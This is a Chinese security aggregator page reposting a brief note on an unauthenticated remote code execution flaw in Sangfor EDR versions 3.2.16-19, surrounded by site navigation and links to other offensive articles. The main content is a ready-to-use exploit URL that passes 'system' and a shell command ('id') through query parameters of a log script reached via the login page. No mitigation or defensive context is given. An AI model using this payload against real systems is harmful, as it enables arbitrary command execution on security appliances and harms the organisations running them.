欢迎光临！

登录

DNSlog
CN-SEC中文网·在线工具
在线工具集合
娱乐一下
友情链接

CN-SEC 中文网

聚合网络安全,存储安全技术文章,融合安全最新讯息

登录

首页
安全新闻
云安全
安全博客
安全漏洞
- 乌云漏洞
安全文章
逆向工程
安全开发
- 代码审计
安全工具
安全闲碎

搜索热点

首页安全漏洞深信服EDR(v3.2.16-19)远程代码执行漏洞

http://cn-sec.com/archives/131665.html 复制链接复制链接

深信服EDR(v3.2.16-19)远程代码执行漏洞

2020年9月14日10:49:38评论444 views字数 144阅读0分28秒阅读模式

漏洞详情

访问一下深信服EDR，显示登陆界面

https://IP:PORT/ui/login.php

深信服EDR(v3.2.16-19)远程代码执行漏洞

此时我们把URL改成如下，即可实现远程代码执行

https://IP:PORT/ui/login.php/tool/log/c.php?strip_slashes=system&host=id

深信服EDR(v3.2.16-19)远程代码执行漏洞

http://cn-sec.com/archives/131665.html 复制链接复制链接

左青龙
微信扫一扫

右白虎
微信扫一扫

安全漏洞安全文章

ip
https
edr
代码执行
php

SRC案例｜2000份国外xss绕过报告

PentestDB各种数据库的利用姿势

干货 | 支付金额类漏洞挖掘技巧总结

记一次价格500rmb的短信轰炸

【相关分享】内网信息收集

如何构建自己的自定义 C2 框架

如何使用CsWhispers向C#项目添加DInvoke和间接系统调用方法

深信服防火墙AF策略路由如何配置？

【OSCP】gigachad

CVE-2024-0015复现 (DubheCTF DayDream)

本文由 admin 发表于 2020年9月14日10:49:38
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
深信服EDR(v3.2.16-19)远程代码执行漏洞http://cn-sec.com/archives/131665.html

红队被扣分，得分规则有所变化！蓝队注意

Razer数据库暴露导致其约10万用户信息泄露；卡巴斯基发布APT组织针对Linux的攻击分析报告

漏洞复现-D-Link 设备存在后门账号(CVE-2024-3273)

漏洞复现-MajorDoMo thumb.php 未授权RCE(CNVD-2024-02175)

Apache Pinot SQL注入与远程代码执行漏洞分析

ATT&CK - 修改受信的执行环境

广告位招租

广告位招租1

广告位招租

广告位招租2

发表评论

匿名网友填写信息

昵称

邮箱

网址

Δ

【腾讯云】产品特惠热卖中

【腾讯云】云服务器、云数据库、COS、CDN、短信等云产品特惠热卖中

本类热门文章

URL Hacking 前端猥琐流 829,764 views 1
电信某系统爆炸核弹级0day 25,060 views 6
常见的华为设备默认账号与密码 14,067 views 0
Spring core RCE 漏洞及修复信息 10,336 views 1
帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757 8,182 views 1
64位Linux下的栈溢出 8,161 views 0
CobaltStrike+MetaSploit 实战联动 7,271 views 4

安全文章

SRC案例｜2000份国外xss绕过报告 04/20 2 views
PentestDB各种数据库的利用姿势 04/20 5 views
干货 | 支付金额类漏洞挖掘技巧总结 04/20 4 views
记一次价格500rmb的短信轰炸 04/20 5 views
【相关分享】内网信息收集 04/20 1 views
如何构建自己的自定义 C2 框架 04/20 2 views
如何使用CsWhispers向C#项目添加DInvoke和间接系统调用方法 04/20 2 views
深信服防火墙AF策略路由如何配置？ 04/20 3 views
【OSCP】gigachad 04/20 2 views
CVE-2024-0015复现 (DubheCTF DayDream) 04/20 1 views

热门标签

ip 远程代码执行漏洞网络 windows linux 密码漏洞复现渗透测试勒索软件黑客代码 https com 未分类攻击者 android ctf 网络攻击 cve 服务器信息安全 microsoft 漏洞预警 sql 公众号 web http rce apache 文件 java cwe app 恶意软件 github 漏洞 payload 应用程序攻击数据安全工具用户网络安全 xss 身份验证安全 shellcode php shell python

最新文章

信息支援部队是一支怎样的力量？国防部解答 04/20 0 views
远控木马之安卓手机篇 04/20 2 views
伊朗APT MINT SANDSTORM 攻击研究 04/20 1 views
黑科技新武器'Deuterbear'瞄准科技、研究和政府部门 04/20 2 views
WIFISKY-7层流控路由器confirm.php RCE 附poc 04/20 3 views
润乾报表dataSphereServlet 任意文件上传 04/20 1 views
Geoserver漏洞复现 04/20 0 views

大家喜欢

669个大学网站都有注入点 4305/01
【工具】Awvs14.7.220401065|可自测Spring4Shell漏洞 2304/03
信息安全工程师教程第2版（文末附电子版下载） 1709/07
Cobalt Strike 4.4 (August 04, 2021)发布 1308/26
正方教务管理系统最新版无条件注入&GetShell 1201/01
Acunetix14.x全版本通杀破解补丁 1012/17
Android逆向练习1 跳过签名验证 901/18

关于本站

CN-SEC.COM中文网

聚合网络安全,存储安全技术文章,融合安全最新讯息

文章104058 留言 543 访客17233483

CN-SEC 中文网

网站概况[CN-SEC 中文网]

文章104058
分类47
标签114016
留言543
链接0
浏览17233483
今日110
本周1293
运行2944 天
更新2024-4-20

Copyright © CN-SEC中文网版权所有.

登录找回密码

记住我的登录信息

输入用户名或电子邮件

HP

重置密码链接通过邮箱发送给您

目录

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码